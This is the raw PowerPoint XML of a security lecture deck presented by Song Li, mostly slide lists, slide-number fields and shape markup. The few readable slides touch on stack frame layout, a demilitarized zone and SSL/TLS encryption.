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110"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId111"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="560" r:id="rId2"/>
    <p:sldId id="561" r:id="rId3"/>
    <p:sldId id="562" r:id="rId4"/>
    <p:sldId id="563" r:id="rId5"/>
    <p:sldId id="564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613" r:id="rId15"/>
    <p:sldId id="614" r:id="rId16"/>
    <p:sldId id="615" r:id="rId17"/>
    <p:sldId id="616" r:id="rId18"/>
    <p:sldId id="617" r:id="rId19"/>
    <p:sldId id="618" r:id="rId20"/>
    <p:sldId id="619" r:id="rId21"/>
    <p:sldId id="620" r:id="rId22"/>
    <p:sldId id="621" r:id="rId23"/>
    <p:sldId id="622" r:id="rId24"/>
    <p:sldId id="623" r:id="rId25"/>
    <p:sldId id="624" r:id="rId26"/>
    <p:sldId id="625" r:id="rId27"/>
    <p:sldId id="626" r:id="rId28"/>
    <p:sldId id="627" r:id="rId29"/>
    <p:sldId id="628" r:id="rId30"/>
    <p:sldId id="629" r:id="rId31"/>
    <p:sldId id="630" r:id="rId32"/>
    <p:sldId id="631" r:id="rId33"/>
    <p:sldId id="632" r:id="rId34"/>
    <p:sldId id="633" r:id="rId35"/>
    <p:sldId id="634" r:id="rId36"/>
    <p:sldId id="635" r:id="rId37"/>
    <p:sldId id="636" r:id="rId38"/>
    <p:sldId id="637" r:id="rId39"/>
    <p:sldId id="638" r:id="rId40"/>
    <p:sldId id="639" r:id="rId41"/>
    <p:sldId id="640" r:id="rId42"/>
    <p:sldId id="641" r:id="rId43"/>
    <p:sldId id="642" r:id="rId44"/>
    <p:sldId id="643" r:id="rId45"/>
    <p:sldId id="644" r:id="rId46"/>
    <p:sldId id="645" r:id="rId47"/>
    <p:sldId id="646" r:id="rId48"/>
    <p:sldId id="647" r:id="rId49"/>
    <p:sldId id="648" r:id="rId50"/>
    <p:sldId id="649" r:id="rId51"/>
    <p:sldId id="650" r:id="rId52"/>
    <p:sldId id="651" r:id="rId53"/>
    <p:sldId id="652" r:id="rId54"/>
    <p:sldId id="653" r:id="rId55"/>
    <p:sldId id="654" r:id="rId56"/>
    <p:sldId id="655" r:id="rId57"/>
    <p:sldId id="656" r:id="rId58"/>
    <p:sldId id="657" r:id="rId59"/>
    <p:sldId id="658" r:id="rId60"/>
    <p:sldId id="659" r:id="rId61"/>
    <p:sldId id="660" r:id="rId62"/>
    <p:sldId id="661" r:id="rId63"/>
    <p:sldId id="662" r:id="rId64"/>
    <p:sldId id="663" r:id="rId65"/>
    <p:sldId id="664" r:id="rId66"/>
    <p:sldId id="665" r:id="rId67"/>
    <p:sldId id="666" r:id="rId68"/>
    <p:sldId id="667" r:id="rId69"/>
    <p:sldId id="573" r:id="rId70"/>
    <p:sldId id="574" r:id="rId71"/>
    <p:sldId id="575" r:id="rId72"/>
    <p:sldId id="576" r:id="rId73"/>
    <p:sldId id="577" r:id="rId74"/>
    <p:sldId id="578" r:id="rId75"/>
    <p:sldId id="579" r:id="rId76"/>
    <p:sldId id="580" r:id="rId77"/>
    <p:sldId id="581" r:id="rId78"/>
    <p:sldId id="582" r:id="rId79"/>
    <p:sldId id="583" r:id="rId80"/>
    <p:sldId id="584" r:id="rId81"/>
    <p:sldId id="585" r:id="rId82"/>
    <p:sldId id="586" r:id="rId83"/>
    <p:sldId id="587" r:id="rId84"/>
    <p:sldId id="588" r:id="rId85"/>
    <p:sldId id="589" r:id="rId86"/>
    <p:sldId id="590" r:id="rId87"/>
    <p:sldId id="591" r:id="rId88"/>
    <p:sldId id="592" r:id="rId89"/>
    <p:sldId id="593" r:id="rId90"/>
    <p:sldId id="594" r:id="rId91"/>
    <p:sldId id="595" r:id="rId92"/>
    <p:sldId id="596" r:id="rId93"/>
    <p:sldId id="597" r:id="rId94"/>
    <p:sldId id="598" r:id="rId95"/>
    <p:sldId id="599" r:id="rId96"/>
    <p:sldId id="600" r:id="rId97"/>
    <p:sldId id="601" r:id="rId98"/>
    <p:sldId id="602" r:id="rId99"/>
    <p:sldId id="603" r:id="rId100"/>
    <p:sldId id="604" r:id="rId101"/>
    <p:sldId id="605" r:id="rId102"/>
    <p:sldId id="606" r:id="rId103"/>
    <p:sldId id="607" r:id="rId104"/>
    <p:sldId id="608" r:id="rId105"/>
    <p:sldId id="609" r:id="rId106"/>
    <p:sldId id="610" r:id="rId107"/>
    <p:sldId id="611" r:id="rId108"/>
    <p:sldId id="612" r:id="rId10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  <a:srgbClr val="FF9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="808080"/>
    <a:srgbClr val="869406"/>
    <a:srgbClr val="666699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31" autoAdjust="0"/>
    <p:restoredTop sz="94608" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="153" d="100"/>
          <a:sy n="153" d="100"/>
        </p:scale>
        <p:origin x="1902" y="150"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880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86"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="-1914" y="-9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C8D74864-EB05-49AA-BA59-F6F5B3173B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883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55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6313" y="4559300"/>
            <a:ext cx="5362575" cy="432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550" y="9120188"/>
            <a:ext cx="3168650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1" tIns="48316" rIns="96631" bIns="48316" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="966621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B35E1360-550A-4529-B4D2-5DC013EF6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3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31BCEC8-8933-4E4A-A94E-6A8806E836E6}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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211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72A1595-BF47-F247-B373-CACDF1166241}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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100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F83731F-B8E2-8144-B60E-0018E1DEB2FD}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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6084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4EB595D-2FBD-C849-A1D1-ADB6EB70706A}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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4123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C64C8B7-4E95-4749-9034-C1E7D043FD50}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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2926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CFB3C51-B8A1-DE44-9510-B39F6F098CF3}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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14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795353A-3F64-AB42-9D80-42C672524723}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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39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499EE3A-E61D-D346-9EFF-4409EC2381D5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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064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C9FDEE5-AE6A-B941-A760-E99659C34C4F}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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04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BA624A9-303C-1245-95E7-B4CE7EC75404}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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9266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0969B10-B46C-A14D-A374-325EC553C34E}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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58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CC57AB89-C56A-8C48-A92B-85E02C1EF5E7}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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3338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E9AB8A7-CF81-394A-9E85-0EA1FC4DDBB8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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425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19625D-223E-864E-BF32-71F8C88E0105}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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733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875A634-11BC-254F-9D17-73AD473DB152}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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0055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0B03F51-A6EE-1640-B35C-6D2BA5029C1C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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4060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06011C3-9B7A-764B-9C91-585D0F3D92B4}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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893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241F79E9-7C30-4F4B-9ADD-CD77FA5D8919}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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1350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9C46510-D16F-1B40-BF92-4EA5F74FF198}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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1219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E540259-5E23-A24A-9EB2-EB81038FD81C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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295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33CC8DA-2EFB-CB4B-B9D5-778D64EB9894}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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0937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9328248-BB7E-624F-A60B-F62992D37D3F}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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38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272334A-9BAC-3C40-B9B7-CFF168D253B2}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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7966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853531B-A5E4-8C40-A71D-0D3168800734}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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984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755BD70-2565-0E41-B9FC-D8825CC6A5AF}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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73407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77FD9F36-8742-324D-8865-3A4F92534B68}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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629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2DE50C2-3FB8-2843-A1B4-2E52A4D7D270}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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3679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9171EEF-D2B1-5340-A0A1-59F12BA574CD}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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929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B6D34B9A-4497-D94C-8339-E89604E0865A}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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7847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21C7A92-C3C7-604C-85A0-906D02A7C88D}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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8802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906AEFD5-03D1-8044-8A40-DC3F7B4F0EC2}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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9339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DA0917A-C61F-7143-BCC5-61624AFBE8D5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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7997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E5F10EC4-08C5-C746-BD5C-BE75155CB6C8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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4691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D693CD7A-503E-8141-9CEC-42FFD6365042}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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600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F8D52EA9-1135-9641-AA18-B7D132052F06}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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demilitarized zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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9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5F42932D-C587-F04A-9176-8EA12C5382E8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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149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34E7ADB2-9FC6-2648-AB35-977AE031B882}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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84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2FD3EC1-F765-C640-A9EF-C7A1BD93C91C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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7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06938E29-094F-484A-8AE6-9B261DC99F28}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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28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1081F40-8F98-EF44-A761-20D0858CBDEC}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetic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284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AFD60254-151D-274F-8841-C35E41FD6558}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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2600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4A778E43-A742-5041-8BE6-36528AB14F8D}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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594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63530" indent="-293665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74661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44526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114390" indent="-234932" defTabSz="965832"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84254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3054119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523983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993848" indent="-234932" defTabSz="96583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fld id="{6AE042F2-16E7-EC47-BA6A-5F6F1E0F0BFC}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica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805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1069123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1069124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020C872-3BC4-4E8F-8435-60B84CF2BB6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90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77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 userDrawn="1"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2060" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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8" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2061" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"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68090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"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6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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3" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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68094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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sp>
        <p:nvSpPr>
          <p:cNvPr id="2052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Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40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309938"/>
            <a:ext cx="5410200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Song Li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375" y="141288"/>
            <a:ext cx="78994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Layout of Typical Stack Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1433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284288"/>
            <a:ext cx="5942012" cy="354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96348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Encryption Example - SSL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067800" cy="5221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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Insertion of cryptography at one layer of the ISO network model (the transport layer)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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SSL – Secure Socket Layer (also called TLS)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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cryptographic protocol that limits two computers to only exchange messages with each other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Very complicated, with many variations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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Used between web servers and browsers for secure communication (credit card numbers)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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server is verified with a 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certificate</a:t>
            </a:r>
            <a:r>
